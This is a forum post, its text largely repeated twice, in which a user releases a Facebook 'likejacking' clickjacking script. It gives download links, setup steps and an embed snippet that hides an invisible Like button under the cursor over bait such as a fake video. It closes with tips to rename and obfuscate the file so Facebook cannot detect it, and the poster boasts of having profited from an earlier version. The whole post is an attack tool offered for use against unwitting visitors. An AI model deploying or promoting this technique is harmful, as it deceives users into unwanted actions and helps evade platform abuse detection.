StellaArtois
BANNED
- Jun 13, 2011
- 104
- 357
Here is another release for today. My very own Like Thief like jacking script. This is so easy, and simple to use. I promise.
Example: http://bbmluv.com/likethief/example.php
Download: http://www.mediafire.com/?9daw88koasb0ohf
Instructions:
1. Upload the JS, and CSS folder to your server.
2. Open the page you want to add click jacking on.
3. Add the following code to the bottom of your page that you want the click jacking on. Add it right at the bottom before the </body> tag:
... You need to modify 3 things in the above code.
Note: You can also give the <body> tag an ID so the click jacking is active on the entire page.
That's it. Just a couple of lines of code on your page. You DO NOT need to include any of the Facebook scripts. My script does all that automatically.
Tips:
Updates:
I will update this as time goes on. If there are any features you want, feel free to let me know in the thread.
If you have any problems, or bugs, let me know and I'll fix them instantly. This is a modified version of my older script that I used to bank a lot of money with in the past.
Enjoy.
Example: http://bbmluv.com/likethief/example.php
Download: http://www.mediafire.com/?9daw88koasb0ohf
Instructions:
1. Upload the JS, and CSS folder to your server.
2. Open the page you want to add click jacking on.
3. Add the following code to the bottom of your page that you want the click jacking on. Add it right at the bottom before the </body> tag:
<script src="js/gQs8pPR.js"></script>
<script>
var bootstrap = new bootstrap('http://yoursite.com', 'ID', 'app ID');
bootstrap.init();
</script>
... You need to modify 3 things in the above code.
http://yoursite.com = Your URL
ID = The ID of the HTML element that you want the invisible like button to be activated under the mouse cursor when the user hovers over it. This can be an image, a button, a pretend video. Anything to get the user to click (check the example.php to see what I mean)
app ID = Your Facebook app ID.
Note: You can also give the <body> tag an ID so the click jacking is active on the entire page.
That's it. Just a couple of lines of code on your page. You DO NOT need to include any of the Facebook scripts. My script does all that automatically.
Tips:
- If you want the user to be redirected after they click I would suggest adding a JavaScript timer, set it to 10 seconds once the user hovers over the button. I might add this to the next update if I get enough requests.
- Change the filename, and maybe obfuscate the code so Facebook can't pick up any footprints.
Updates:
I will update this as time goes on. If there are any features you want, feel free to let me know in the thread.
If you have any problems, or bugs, let me know and I'll fix them instantly. This is a modified version of my older script that I used to bank a lot of money with in the past.
Enjoy.
Last edited: